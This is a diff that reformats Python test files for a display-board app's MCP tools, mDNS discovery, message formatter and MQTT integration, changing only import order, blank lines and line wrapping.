 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
+
 
 def _call_tool(mcp_instance: Any, tool_name: str, **kwargs: Any) -> Any:
     """Synchronously call a registered MCP tool by name.
@@ -41,6 +42,7 @@ def _call_tool(mcp_instance: Any, tool_name: str, **kwargs: Any) -> Any:
     original decorated function.  We call it directly, bypassing JSON-RPC.
     """
     import asyncio
+
     mgr = mcp_instance._tool_manager
     tool = mgr._tools.get(tool_name)
     if tool is None:
@@ -54,6 +56,7 @@ def _call_tool(mcp_instance: Any, tool_name: str, **kwargs: Any) -> Any:
 # ---------------------------------------------------------------------------
 # Fixtures
 # ---------------------------------------------------------------------------
+
 
 @pytest.fixture(scope="module")
 def mcp():
@@ -185,6 +188,7 @@ def mock_settings_service():
     MagicMock.__dict__ handling doesn't interfere.
     """
     from types import SimpleNamespace
+
     svc = MagicMock()
     svc.get_display_settings.return_value = SimpleNamespace(brightness=80, refresh_rate=30)
     svc.get_location_settings.return_value = SimpleNamespace(
@@ -197,6 +201,7 @@ def mock_settings_service():
 # ---------------------------------------------------------------------------
 # Module-level guards
 # ---------------------------------------------------------------------------
+
 
 def test_mcp_available():
     """_MCP_AVAILABLE is True when the mcp package is installed."""
@@ -211,6 +216,7 @@ def test_mcp_server_singleton_not_none():
 def test_build_mcp_server_returns_fastmcp(mcp):
     """_build_mcp_server() returns a FastMCP instance."""
     from mcp.server.fastmcp import FastMCP
+
     assert isinstance(mcp, FastMCP)
 
 
@@ -269,6 +275,7 @@ def test_tool_count(mcp):
 # ---------------------------------------------------------------------------
 # Plugin tools
 # ---------------------------------------------------------------------------
+
 
 class TestListInstalledPlugins:
     def test_returns_json_array(self, mcp, mock_registry, mock_config_manager):
@@ -432,6 +439,7 @@ class TestGetTemplateVariables:
 class TestGetPluginData:
     def test_returns_live_values(self, mcp):
         from src.plugins.base import PluginResult
+
         mock_reg = MagicMock()
         mock_reg.fetch_plugin_data.return_value = PluginResult(
             available=True,
@@ -446,6 +454,7 @@ class TestGetPluginData:
 
     def test_disabled_plugin_returns_error_field(self, mcp):
         from src.plugins.base import PluginResult
+
         mock_reg = MagicMock()
         mock_reg.fetch_plugin_data.return_value = PluginResult(
             available=False,
@@ -461,6 +470,7 @@ class TestGetPluginData:
 # ---------------------------------------------------------------------------
 # Page tools
 # ---------------------------------------------------------------------------
+
 
 class TestListPages:
     def test_returns_page_list(self, mcp, mock_page_service):
@@ -587,6 +597,7 @@ class TestRenderPagePreview:
 # Schedule tools
 # ---------------------------------------------------------------------------
 
+
 class TestListSchedules:
     def test_returns_schedule_list(self, mcp, mock_schedule_service):
         with patch("src.schedules.service.get_schedule_service", return_value=mock_schedule_service):
@@ -649,6 +660,7 @@ class TestDeleteSchedule:
 # Carousel tools
 # ---------------------------------------------------------------------------
 
+
 class TestListCarousels:
     def test_returns_carousel_list(self, mcp, mock_carousel_service):
         with patch("src.carousels.service.get_carousel_service", return_value=mock_carousel_service):
@@ -699,6 +711,7 @@ class TestDeleteCarousel:
 # System tools
 # ---------------------------------------------------------------------------
 
+
 class TestGetSystemStatus:
     def test_returns_version_and_status(self, mcp, mock_registry):
         with (
@@ -707,6 +720,7 @@ class TestGetSystemStatus:
         ):
             # Patch the import inside the tool function
             import src.api_server as api_mod
+
             orig_running = getattr(api_mod, "_service_running", False)
             try:
                 api_mod._service_running = True
@@ -768,9 +782,11 @@ class TestSetScheduleMode:
 # MCP Resources
 # ---------------------------------------------------------------------------
 
+
 def _call_resource(mcp_instance: Any, uri: str) -> str:
     """Call a resource handler directly."""
     import asyncio
+
     mgr = mcp_instance._resource_manager
     # Resources are keyed by URI template
     for key, resource in mgr._resources.items():
@@ -819,9 +835,11 @@ class TestMCPResources:
 # MCP Prompts
 # ---------------------------------------------------------------------------
 
+
 def _call_prompt(mcp_instance: Any, prompt_name: str, **kwargs: Any) -> str:
     """Call a prompt handler directly."""
     import asyncio
+
     mgr = mcp_instance._prompt_manager
     prompt = mgr._prompts.get(prompt_name)
     if prompt is None:
@@ -867,39 +885,43 @@ class TestMCPPrompts:
 # Error resilience: ensure no tool raises an unhandled exception
 # ---------------------------------------------------------------------------
 
+
 class TestToolErrorResilience:
     """All tools should catch exceptions and return a structured response."""
 
-    @pytest.mark.parametrize("tool_name,kwargs", [
-        ("list_installed_plugins", {}),
-        ("list_registry_plugins", {}),
-        ("install_plugin", {"plugin_id": "x"}),
-        ("enable_plugin", {"plugin_id": "x"}),
-        ("disable_plugin", {"plugin_id": "x"}),
-        ("uninstall_plugin", {"plugin_id": "x"}),
-        ("configure_plugin", {"plugin_id": "x", "config": {}}),
-        ("update_plugin", {"plugin_id": "x"}),
-        ("get_template_variables", {}),
-        ("get_plugin_data", {"plugin_id": "x"}),
-        ("list_pages", {}),
-        ("get_page", {"page_id": "x"}),
-        ("create_page", {"name": "x", "template_lines": []}),
-        ("update_page", {"page_id": "x"}),
-        ("delete_page", {"page_id": "x"}),
-        ("render_page_preview", {"template_lines": ["{{x.y}}"]}),
-        ("list_schedules", {}),
-        ("create_schedule", {"page_id": "x", "start_time": "08:00"}),
-        ("update_schedule", {"schedule_id": "x"}),
-        ("delete_schedule", {"schedule_id": "x"}),
-        ("list_carousels", {}),
-        ("create_carousel", {"name": "x", "page_ids": []}),
-        ("update_carousel", {"carousel_id": "x"}),
-        ("delete_carousel", {"carousel_id": "x"}),
-        ("get_system_status", {}),
-        ("get_settings_summary", {}),
-        ("set_active_page", {"page_id": "x"}),
-        ("set_schedule_mode", {"enabled": True}),
-    ])
+    @pytest.mark.parametrize(
+        "tool_name,kwargs",
+        [
+            ("list_installed_plugins", {}),
+            ("list_registry_plugins", {}),
+            ("install_plugin", {"plugin_id": "x"}),
+            ("enable_plugin", {"plugin_id": "x"}),
+            ("disable_plugin", {"plugin_id": "x"}),
+            ("uninstall_plugin", {"plugin_id": "x"}),
+            ("configure_plugin", {"plugin_id": "x", "config": {}}),
+            ("update_plugin", {"plugin_id": "x"}),
+            ("get_template_variables", {}),
+            ("get_plugin_data", {"plugin_id": "x"}),
+            ("list_pages", {}),
+            ("get_page", {"page_id": "x"}),
+            ("create_page", {"name": "x", "template_lines": []}),
+            ("update_page", {"page_id": "x"}),
+            ("delete_page", {"page_id": "x"}),
+            ("render_page_preview", {"template_lines": ["{{x.y}}"]}),
+            ("list_schedules", {}),
+            ("create_schedule", {"page_id": "x", "start_time": "08:00"}),
+            ("update_schedule", {"schedule_id": "x"}),
+            ("delete_schedule", {"schedule_id": "x"}),
+            ("list_carousels", {}),
+            ("create_carousel", {"name": "x", "page_ids": []}),
+            ("update_carousel", {"carousel_id": "x"}),
+            ("delete_carousel", {"carousel_id": "x"}),
+            ("get_system_status", {}),
+            ("get_settings_summary", {}),
+            ("set_active_page", {"page_id": "x"}),
+            ("set_schedule_mode", {"enabled": True}),
+        ],
+    )
     def test_tool_does_not_raise(self, mcp, tool_name: str, kwargs: dict):
         """Each tool returns a dict/list (not raises) even when all services fail."""
         with (
@@ -918,4 +940,4 @@ class TestToolErrorResilience:
         # despite our boom — e.g., get_settings_summary swallows per-field
         # errors and returns {}). Either way it must be a structured value,
         # never a raw exception.
-        assert isinstance(result, (dict, list))
+        assert isinstance(result, dict | list)

--- a/tests/test_mdns.py
+++ b/tests/test_mdns.py
@@ -1,47 +1,54 @@
 """Tests for mDNS/Bonjour service (src.system.mdns)."""
 
-from unittest.mock import patch, MagicMock
-
+from unittest.mock import MagicMock, patch
 
 # ---------- MDNSService unit tests ----------
+
 
 class TestMDNSServiceInit:
     """Test MDNSService initialisation and default values."""
 
     def test_default_hostname(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService()
         assert svc.hostname == "fiestaboard"
 
     def test_default_port(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService()
         assert svc.port == 4420
 
     def test_custom_hostname(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService(hostname="myboard")
         assert svc.hostname == "myboard"
 
     def test_custom_port(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService(port=8080)
         assert svc.port == 8080
 
     def test_hostname_from_env(self):
         from src.system.mdns import MDNSService
+
         with patch.dict("os.environ", {"MDNS_HOSTNAME": "envboard"}):
             svc = MDNSService()
         assert svc.hostname == "envboard"
 
     def test_port_from_env(self):
         from src.system.mdns import MDNSService
+
         with patch.dict("os.environ", {"MDNS_PORT": "9090"}):
             svc = MDNSService()
         assert svc.port == 9090
 
     def test_explicit_overrides_env(self):
         from src.system.mdns import MDNSService
+
         with patch.dict("os.environ", {"MDNS_HOSTNAME": "envboard"}):
             svc = MDNSService(hostname="explicit")
         assert svc.hostname == "explicit"
@@ -52,16 +59,19 @@ class TestMDNSServiceLocalUrl:
 
     def test_default_url(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService()
         assert svc.local_url == "http://fiestaboard.local:4420"
 
     def test_port_80_omits_port(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService(port=80)
         assert svc.local_url == "http://fiestaboard.local"
 
     def test_custom_hostname_in_url(self):
         from src.system.mdns import MDNSService
+
         svc = MDNSService(hostname="myboard", port=4420)
         assert svc.local_url == "http://myboard.local:4420"
 
@@ -75,8 +85,7 @@ class TestMDNSServiceLifecycle:
         mock_zc = MagicMock()
         mock_si_cls = MagicMock()
 
-        with patch("zeroconf.Zeroconf", return_value=mock_zc), \
-             patch("zeroconf.ServiceInfo", mock_si_cls):
+        with patch("zeroconf.Zeroconf", return_value=mock_zc), patch("zeroconf.ServiceInfo", mock_si_cls):
             svc = MDNSService(hostname="testboard", port=4420)
             result = svc.start()
 
@@ -88,8 +97,7 @@ class TestMDNSServiceLifecycle:
         from src.system.mdns import MDNSService
 
         mock_zc = MagicMock()
-        with patch("zeroconf.Zeroconf", return_value=mock_zc), \
-             patch("zeroconf.ServiceInfo", MagicMock()):
+        with patch("zeroconf.Zeroconf", return_value=mock_zc), patch("zeroconf.ServiceInfo", MagicMock()):
             svc = MDNSService()
             svc.start()
             svc.start()  # second call should be a no-op
@@ -101,8 +109,7 @@ class TestMDNSServiceLifecycle:
         from src.system.mdns import MDNSService
 
         mock_zc = MagicMock()
-        with patch("zeroconf.Zeroconf", return_value=mock_zc), \
-             patch("zeroconf.ServiceInfo", MagicMock()):
+        with patch("zeroconf.Zeroconf", return_value=mock_zc), patch("zeroconf.ServiceInfo", MagicMock()):
             svc = MDNSService()
             svc.start()
             svc.stop()
@@ -114,6 +121,7 @@ class TestMDNSServiceLifecycle:
     def test_stop_when_not_started(self):
         """Calling stop on an un-started service should not raise."""
         from src.system.mdns import MDNSService
+
         svc = MDNSService()
         svc.stop()  # should not raise
         assert svc.is_running is False
@@ -148,15 +156,15 @@ class TestGetLocalIp:
 
     def test_returns_string(self):
         from src.system.mdns import _get_local_ip
+
         ip = _get_local_ip()
         assert isinstance(ip, str)
 
     def test_fallback_on_error(self):
         from src.system.mdns import _get_local_ip
+
         with patch("socket.socket") as mock_sock:
-            mock_sock.return_value.__enter__ = MagicMock(
-                side_effect=OSError("no network")
-            )
+            mock_sock.return_value.__enter__ = MagicMock(side_effect=OSError("no network"))
             mock_sock.return_value.__exit__ = MagicMock(return_value=False)
             ip = _get_local_ip()
         assert ip == "127.0.0.1"
@@ -167,11 +175,13 @@ class TestModuleSingletonHelpers:
 
     def _reset(self):
         import src.system.mdns as mod
+
         mod._mdns_service = None
 
     def test_get_mdns_service_singleton(self):
         self._reset()
         from src.system.mdns import get_mdns_service
+
         s1 = get_mdns_service()
         s2 = get_mdns_service()
         assert s1 is s2
@@ -179,10 +189,9 @@ class TestModuleSingletonHelpers:
 
     def test_start_mdns_calls_start(self):
         self._reset()
-        from src.system.mdns import start_mdns, get_mdns_service
+        from src.system.mdns import get_mdns_service, start_mdns
 
-        with patch("zeroconf.Zeroconf", return_value=MagicMock()), \
-             patch("zeroconf.ServiceInfo", MagicMock()):
+        with patch("zeroconf.Zeroconf", return_value=MagicMock()), patch("zeroconf.ServiceInfo", MagicMock()):
             result = start_mdns()
 
         assert result is True
@@ -192,27 +201,32 @@ class TestModuleSingletonHelpers:
     def test_stop_mdns_when_not_started(self):
         self._reset()
         from src.system.mdns import stop_mdns
+
         stop_mdns()  # should not raise
         self._reset()
 
 
 # ---------- Board scanning / discovery tests ----------
 
+
 class TestProbeVestaboardPort:
     """Test the _probe_vestaboard_port helper."""
 
     def test_returns_false_when_port_closed(self):
         from src.system.mdns import _probe_vestaboard_port
+
         # Port 1 on localhost is almost certainly not listening
         assert _probe_vestaboard_port("127.0.0.1", port=1, timeout=0.2) is False
 
     def test_returns_false_for_unreachable_host(self):
         from src.system.mdns import _probe_vestaboard_port
+
         # Non-routable address should fail quickly
         assert _probe_vestaboard_port("192.0.2.1", port=7000, timeout=0.2) is False
 
     def test_returns_true_when_connected(self):
         from src.system.mdns import _probe_vestaboard_port
+
         with patch("socket.socket") as mock_sock_cls:
             mock_sock = MagicMock()
             mock_sock_cls.return_value.__enter__ = MagicMock(return_value=mock_sock)
@@ -225,6 +239,7 @@ class TestScanForBoards:
 
     def test_returns_list(self):
         from src.system.mdns import scan_for_boards
+
         # With mocked zeroconf and no real network, should return a list
         with patch("src.system.mdns._get_local_ip", return_value="127.0.0.1"):
             # loopback /24 probing is skipped when IP is 127.0.0.1
@@ -233,6 +248,7 @@ class TestScanForBoards:
 
     def test_returns_empty_when_no_boards(self):
         from src.system.mdns import scan_for_boards
+
         with patch("src.system.mdns._get_local_ip", return_value="127.0.0.1"):
             result = scan_for_boards(timeout=0.1)
         assert result == []
@@ -254,10 +270,12 @@ class TestScanForBoards:
             listener.add_service(zc, stype, "Vestaboard._vestaboard._tcp.local.")
             return MagicMock()
 
-        with patch("zeroconf.Zeroconf", return_value=mock_zc), \
-             patch("zeroconf.ServiceBrowser", side_effect=fake_browser), \
-             patch("time.sleep"), \
-             patch("src.system.mdns._get_local_ip", return_value="127.0.0.1"):
+        with (
+            patch("zeroconf.Zeroconf", return_value=mock_zc),
+            patch("zeroconf.ServiceBrowser", side_effect=fake_browser),
+            patch("time.sleep"),
+            patch("src.system.mdns._get_local_ip", return_value="127.0.0.1"),
+        ):
             result = scan_for_boards(timeout=0.1)
 
         assert len(result) == 1
@@ -272,11 +290,13 @@ class TestScanForBoards:
         def fake_probe(ip, port=7000, timeout=0.5):
             return ip == "10.0.0.42"
 
-        with patch("src.system.mdns._probe_vestaboard_port", side_effect=fake_probe), \
-             patch("src.system.mdns._get_local_ip", return_value="10.0.0.1"), \
-             patch("zeroconf.Zeroconf", return_value=MagicMock()), \
-             patch("zeroconf.ServiceBrowser", return_value=MagicMock()), \
-             patch("time.sleep"):
+        with (
+            patch("src.system.mdns._probe_vestaboard_port", side_effect=fake_probe),
+            patch("src.system.mdns._get_local_ip", return_value="10.0.0.1"),
+            patch("zeroconf.Zeroconf", return_value=MagicMock()),
+            patch("zeroconf.ServiceBrowser", return_value=MagicMock()),
+            patch("time.sleep"),
+        ):
             result = scan_for_boards(timeout=0.1)
 
         ips = [b["ip"] for b in result]
@@ -301,11 +321,13 @@ class TestScanForBoards:
         def fake_probe(ip, port=7000, timeout=0.5):
             return ip == "10.0.0.42"
 
-        with patch("zeroconf.Zeroconf", return_value=mock_zc), \
-             patch("zeroconf.ServiceBrowser", side_effect=fake_browser), \
-             patch("src.system.mdns._probe_vestaboard_port", side_effect=fake_probe), \
-             patch("src.system.mdns._get_local_ip", return_value="10.0.0.1"), \
-             patch("time.sleep"):
+        with (
+            patch("zeroconf.Zeroconf", return_value=mock_zc),
+            patch("zeroconf.ServiceBrowser", side_effect=fake_browser),
+            patch("src.system.mdns._probe_vestaboard_port", side_effect=fake_probe),
+            patch("src.system.mdns._get_local_ip", return_value="10.0.0.1"),
+            patch("time.sleep"),
+        ):
             result = scan_for_boards(timeout=0.1)
 
         ips = [b["ip"] for b in result]
@@ -314,7 +336,10 @@ class TestScanForBoards:
     def test_graceful_when_zeroconf_missing(self):
         """scan_for_boards should not raise if zeroconf is not installed."""
         from src.system.mdns import scan_for_boards
-        with patch("builtins.__import__", side_effect=ImportError("no zeroconf")), \
-             patch("src.system.mdns._get_local_ip", return_value="127.0.0.1"):
+
+        with (
+            patch("builtins.__import__", side_effect=ImportError("no zeroconf")),
+            patch("src.system.mdns._get_local_ip", return_value="127.0.0.1"),
+        ):
             result = scan_for_boards(timeout=0.1)
         assert isinstance(result, list)

--- a/tests/test_mdns_service.py
+++ b/tests/test_mdns_service.py
@@ -6,28 +6,29 @@ fallback. Actual zeroconf registration is mocked to avoid hardware
 dependencies. This addresses issue #505.
 """
 
+from unittest.mock import MagicMock, patch
+
 import pytest
-from unittest.mock import patch, MagicMock
+
 import src.system.mdns as mdns_module
 from src.system.mdns import (
+    DEFAULT_MDNS_HOSTNAME,
+    DEFAULT_SERVICE_PORT,
     MDNSService,
     _get_local_ip,
     get_mdns_service,
     start_mdns,
     stop_mdns,
-    DEFAULT_MDNS_HOSTNAME,
-    DEFAULT_SERVICE_PORT,
 )
-
 
 # ---------------------------------------------------------------------------
 # Fixtures
 # ---------------------------------------------------------------------------
 
+
 @pytest.fixture(autouse=True)
 def reset_singleton():
     """Reset global singleton state between tests."""
-    original = mdns_module._mdns_service
     mdns_module._mdns_service = None
     yield
     mdns_module._mdns_service = None
@@ -36,6 +37,7 @@ def reset_singleton():
 # ---------------------------------------------------------------------------
 # MDNSService properties
 # ---------------------------------------------------------------------------
+
 
 class TestMDNSServiceProperties:
     def test_default_hostname(self):
@@ -85,6 +87,7 @@ class TestMDNSServiceProperties:
 # MDNSService.start — with zeroconf mocked
 # ---------------------------------------------------------------------------
 
+
 class TestMDNSServiceStart:
     def test_start_success(self):
         svc = MDNSService()
@@ -92,12 +95,15 @@ class TestMDNSServiceStart:
         mock_info = MagicMock()
         mock_info.name = "FiestaBoard._http._tcp.local."
 
-        with patch.dict("sys.modules", {
-            "zeroconf": MagicMock(
-                Zeroconf=MagicMock(return_value=mock_zc),
-                ServiceInfo=MagicMock(return_value=mock_info),
-            )
-        }):
+        with patch.dict(
+            "sys.modules",
+            {
+                "zeroconf": MagicMock(
+                    Zeroconf=MagicMock(return_value=mock_zc),
+                    ServiceInfo=MagicMock(return_value=mock_info),
+                )
+            },
+        ):
             with patch("src.system.mdns._get_local_ip", return_value="192.168.1.100"):
                 result = svc.start()
 
@@ -127,12 +133,15 @@ class TestMDNSServiceStart:
         mock_zeroconf.Zeroconf.side_effect = Exception("network error")
         mock_service_info = MagicMock()
 
-        with patch.dict("sys.modules", {
-            "zeroconf": MagicMock(
-                Zeroconf=MagicMock(side_effect=Exception("fail")),
-                ServiceInfo=mock_service_info,
-            )
-        }):
+        with patch.dict(
+            "sys.modules",
+            {
+                "zeroconf": MagicMock(
+                    Zeroconf=MagicMock(side_effect=Exception("fail")),
+                    ServiceInfo=mock_service_info,
+                )
+            },
+        ):
             with patch("src.system.mdns._get_local_ip", return_value="10.0.0.1"):
                 result = svc.start()
 
@@ -143,6 +152,7 @@ class TestMDNSServiceStart:
 # ---------------------------------------------------------------------------
 # MDNSService.stop
 # ---------------------------------------------------------------------------
+
 
 class TestMDNSServiceStop:
     def test_stop_when_not_started_is_safe(self):
@@ -193,6 +203,7 @@ class TestMDNSServiceStop:
 # _get_local_ip
 # ---------------------------------------------------------------------------
 
+
 class TestGetLocalIp:
     def test_returns_string(self):
         ip = _get_local_ip()
@@ -214,6 +225,7 @@ class TestGetLocalIp:
 # ---------------------------------------------------------------------------
 # Singleton helpers: get_mdns_service, start_mdns, stop_mdns
 # ---------------------------------------------------------------------------
+
 
 class TestSingletonHelpers:
     def test_get_mdns_service_returns_instance(self):

--- a/tests/test_message_formatter.py
+++ b/tests/test_message_formatter.py
@@ -5,6 +5,7 @@ MessageFormatter contains pure formatting logic that is highly testable
 """
 
 import pytest
+
 from src.formatters.message_formatter import MessageFormatter, get_message_formatter
 
 
@@ -16,6 +17,7 @@ def fmt():
 # ---------------------------------------------------------------------------
 # format_weather
 # ---------------------------------------------------------------------------
+
 
 class TestFormatWeather:
     def test_empty_data_returns_unavailable(self, fmt):
@@ -74,6 +76,7 @@ class TestFormatWeather:
 # format_datetime
 # ---------------------------------------------------------------------------
 
+
 class TestFormatDatetime:
     def test_empty_data_returns_unavailable(self, fmt):
         assert fmt.format_datetime({}) == "Date/Time: Unavailable"
@@ -117,6 +120,7 @@ class TestFormatDatetime:
 # format_guest_wifi
 # ---------------------------------------------------------------------------
 
+
 class TestFormatGuestWifi:
     def test_contains_ssid_and_password(self, fmt):
         result = fmt.format_guest_wifi("MyNetwork", "s3cr3t")
@@ -141,15 +145,19 @@ class TestFormatGuestWifi:
 # _get_temp_color
 # ---------------------------------------------------------------------------
 
+
 class TestGetTempColor:
-    @pytest.mark.parametrize("temp,expected_color", [
-        (95, "red"),
-        (85, "orange"),
-        (75, "yellow"),
-        (65, "green"),
-        (50, "blue"),
-        (30, "violet"),
-    ])
+    @pytest.mark.parametrize(
+        "temp,expected_color",
+        [
+            (95, "red"),
+            (85, "orange"),
+            (75, "yellow"),
+            (65, "green"),
+            (50, "blue"),
+            (30, "violet"),
+        ],
+    )
     def test_temp_ranges(self, fmt, temp, expected_color):
         result = fmt._get_temp_color(temp)
         assert expected_color in result
@@ -176,6 +184,7 @@ class TestGetTempColor:
 # ---------------------------------------------------------------------------
 # split_into_lines
 # ---------------------------------------------------------------------------
+
 
 class TestSplitIntoLines:
     def test_short_text_unchanged(self, fmt):
@@ -208,6 +217,7 @@ class TestSplitIntoLines:
 # ---------------------------------------------------------------------------
 # format_star_trek_quote
 # ---------------------------------------------------------------------------
+
 
 class TestFormatStarTrekQuote:
     def test_tng_uses_yellow(self, fmt):
@@ -243,6 +253,7 @@ class TestFormatStarTrekQuote:
 # ---------------------------------------------------------------------------
 # format_house_status
 # ---------------------------------------------------------------------------
+
 
 class TestFormatHouseStatus:
     def test_header_present(self, fmt):
@@ -280,6 +291,7 @@ class TestFormatHouseStatus:
 # format_stocks
 # ---------------------------------------------------------------------------
 
+
 class TestFormatStocks:
     def test_empty_data(self, fmt):
         assert fmt.format_stocks({}) == "Stocks: Unavailable"
@@ -308,6 +320,7 @@ class TestFormatStocks:
 # ---------------------------------------------------------------------------
 # format_muni
 # ---------------------------------------------------------------------------
+
 
 class TestFormatMuni:
     def test_empty_data(self, fmt):
@@ -364,6 +377,7 @@ class TestFormatMuni:
 # format_combined
 # ---------------------------------------------------------------------------
 
+
 class TestFormatCombined:
     def test_date_and_weather(self, fmt):
         weather = {
@@ -399,6 +413,7 @@ class TestFormatCombined:
 # ---------------------------------------------------------------------------
 # get_message_formatter factory
 # ---------------------------------------------------------------------------
+
 
 def test_get_message_formatter_returns_instance():
     instance = get_message_formatter()

--- a/tests/test_mqtt_client.py
+++ b/tests/test_mqtt_client.py
@@ -1,10 +1,11 @@
 """Tests for MQTT client."""
 
-import pytest
 from unittest.mock import MagicMock, patch
 
+import pytest
+
+from src.mqtt.client import MQTTClient, get_mqtt_client, set_mqtt_client_instance
 from src.mqtt.config import MQTTConfig
-from src.mqtt.client import MQTTClient, set_mqtt_client_instance, get_mqtt_client
 
 
 @pytest.fixture
@@ -38,9 +39,7 @@ class TestMQTTClientStart:
         get_paho.return_value = mock_module
         client = MQTTClient(mqtt_config)
         client.start()
-        mock_client.connect_async.assert_called_once_with(
-            "broker.test", 1883, keepalive=60
-        )
+        mock_client.connect_async.assert_called_once_with("broker.test", 1883, keepalive=60)
         mock_client.loop_start.assert_called_once()
         assert client.is_running()
 
@@ -92,7 +91,7 @@ class TestMQTTClientOnConnect:
         assert "fiestaboard/status" in topics
         mock_client.subscribe.assert_called_once()
         sub_call = mock_client.subscribe.call_args[0][0]
-        assert "fiestaboard/+/set" == sub_call
+        assert sub_call == "fiestaboard/+/set"
 
 
 class TestMQTTClientStop:
@@ -156,6 +155,7 @@ class TestGetPahoClient:
 
     def test_get_paho_client_returns_module(self):
         from src.mqtt.client import _get_paho_client
+
         mod = _get_paho_client()
         assert hasattr(mod, "Client")
 
@@ -394,6 +394,7 @@ class TestSyncLoop:
 
         def stop_after_one(*args, **kwargs):
             client._running = False
+
         publisher.gather_and_publish.side_effect = stop_after_one
 
         with patch("src.mqtt.client.time.sleep"):

--- a/tests/test_mqtt_commands.py
+++ b/tests/test_mqtt_commands.py
@@ -1,11 +1,12 @@
 """Tests for MQTT command handler."""
 
-import pytest
 from unittest.mock import MagicMock, patch
 
-from src.mqtt.config import MQTTConfig
+import pytest
+
 from src.mqtt.client import MQTTClient
 from src.mqtt.commands import CommandHandler
+from src.mqtt.config import MQTTConfig
 
 
 @pytest.fixture
@@ -224,7 +225,9 @@ class TestCommandHandlerEventPublishing:
     @patch("src.text_to_board.text_to_board_array")
     @patch("src.api_server.get_service")
     @patch("src.config.Config")
-    def test_send_message_fires_display_updated_event(self, mock_config, get_service, text_to_board, get_settings, handler_with_publisher):
+    def test_send_message_fires_display_updated_event(
+        self, mock_config, get_service, text_to_board, get_settings, handler_with_publisher
+    ):
         handler, publisher = handler_with_publisher
         mock_config.is_silence_mode_active.return_value = False
         service = MagicMock()
@@ -232,9 +235,7 @@ class TestCommandHandlerEventPublishing:
         get_service.return_value = service
         text_to_board.return_value = [[0] * 22 for _ in range(6)]
         settings = MagicMock()
-        settings.get_transition_settings.return_value = MagicMock(
-            strategy="column", step_interval_ms=100, step_size=1
-        )
+        settings.get_transition_settings.return_value = MagicMock(strategy="column", step_interval_ms=100, step_size=1)
         get_settings.return_value = settings
         handler.handle("send_message", "Hello World")
         publisher.publish_event.assert_called_once()
@@ -272,9 +273,15 @@ class TestCommandHandlerPageNavigation:
     def test_next_page_advances_to_next(self, get_page, get_settings, handler_with_publisher):
         handler, publisher = handler_with_publisher
         page_svc = MagicMock()
-        page1 = MagicMock(); page1.name = "Weather"; page1.id = "p1"
-        page2 = MagicMock(); page2.name = "Sports"; page2.id = "p2"
-        page3 = MagicMock(); page3.name = "News"; page3.id = "p3"
+        page1 = MagicMock()
+        page1.name = "Weather"
+        page1.id = "p1"
+        page2 = MagicMock()
+        page2.name = "Sports"
+        page2.id = "p2"
+        page3 = MagicMock()
+        page3.name = "News"
+        page3.id = "p3"
         page_svc.list_pages.return_value = [page1, page2, page3]
         get_page.return_value = page_svc
         settings = MagicMock()
@@ -292,8 +299,12 @@ class TestCommandHandlerPageNavigation:
     def test_next_page_wraps_around(self, get_page, get_settings, handler):
         """At the last page, next should wrap to the first."""
         page_svc = MagicMock()
-        page1 = MagicMock(); page1.name = "A"; page1.id = "p1"
-        page2 = MagicMock(); page2.name = "B"; page2.id = "p2"
+        page1 = MagicMock()
+        page1.name = "A"
+        page1.id = "p1"
+        page2 = MagicMock()
+        page2.name = "B"
+        page2.id = "p2"
         page_svc.list_pages.return_value = [page1, page2]
         get_page.return_value = page_svc
         settings = MagicMock()
@@ -307,9 +318,15 @@ class TestCommandHandlerPageNavigation:
     def test_previous_page_goes_back(self, get_page, get_settings, handler_with_publisher):
         handler, publisher = handler_with_publisher
         page_svc = MagicMock()
-        page1 = MagicMock(); page1.name = "Weather"; page1.id = "p1"
-        page2 = MagicMock(); page2.name = "Sports"; page2.id = "p2"
-        page3 = MagicMock(); page3.name = "News"; page3.id = "p3"
+        page1 = MagicMock()
+        page1.name = "Weather"
+        page1.id = "p1"
+        page2 = MagicMock()
+        page2.name = "Sports"
+        page2.id = "p2"
+        page3 = MagicMock()
+        page3.name = "News"
+        page3.id = "p3"
         page_svc.list_pages.return_value = [page1, page2, page3]
         get_page.return_value = page_svc
         settings = MagicMock()
@@ -327,8 +344,12 @@ class TestCommandHandlerPageNavigation:
     def test_previous_page_wraps_around(self, get_page, get_settings, handler):
         """At the first page, previous should wrap to the last."""
         page_svc = MagicMock()
-        page1 = MagicMock(); page1.name = "A"; page1.id = "p1"
-        page2 = MagicMock(); page2.name = "B"; page2.id = "p2"
+        page1 = MagicMock()
+        page1.name = "A"
+        page1.id = "p1"
+        page2 = MagicMock()
+        page2.name = "B"
+        page2.id = "p2"
         page_svc.list_pages.return_value = [page1, page2]
         get_page.return_value = page_svc
         settings = MagicMock()

--- a/tests/test_mqtt_config.py
+++ b/tests/test_mqtt_config.py
@@ -1,6 +1,5 @@
 """Tests for MQTT configuration."""
 
-
 from src.mqtt.config import (
     DEFAULT_BASE_TOPIC,
     DEFAULT_BROKER_HOST,

--- a/tests/test_mqtt_discovery.py
+++ b/tests/test_mqtt_discovery.py
@@ -65,16 +65,12 @@ class TestEntityDefinitions:
     def test_all_entities_have_names(self):
         """All entities must have non-empty names."""
         for entity in ENTITY_DEFINITIONS:
-            assert entity.name and entity.name.strip(), (
-                f"Entity '{entity.object_id}' has empty name"
-            )
+            assert entity.name and entity.name.strip(), f"Entity '{entity.object_id}' has empty name"
 
     def test_all_entities_have_icons(self):
         """All entities must have MDI icons."""
         for entity in ENTITY_DEFINITIONS:
-            assert entity.icon.startswith("mdi:"), (
-                f"Entity '{entity.object_id}' icon must start with 'mdi:'"
-            )
+            assert entity.icon.startswith("mdi:"), f"Entity '{entity.object_id}' icon must start with 'mdi:'"
 
     def test_switch_entities(self):
         """Should have exactly 2 switch entities."""
@@ -229,8 +225,11 @@ class TestDiscoveryTopics:
     def test_topic_format(self, mqtt_config):
         """Discovery topic must follow HA convention: {prefix}/{type}/{node_id}/{object_id}/config."""
         entity = EntityDefinition(
-            entity_type="switch", object_id="schedule_enabled",
-            name="Schedule", icon="mdi:calendar-clock", has_command=True,
+            entity_type="switch",
+            object_id="schedule_enabled",
+            name="Schedule",
+            icon="mdi:calendar-clock",
+            has_command=True,
         )
         topic = build_discovery_topic(mqtt_config, entity)
         assert topic == "homeassistant/switch/fiestaboard_1/schedule_enabled/config"
@@ -239,8 +238,10 @@ class TestDiscoveryTopics:
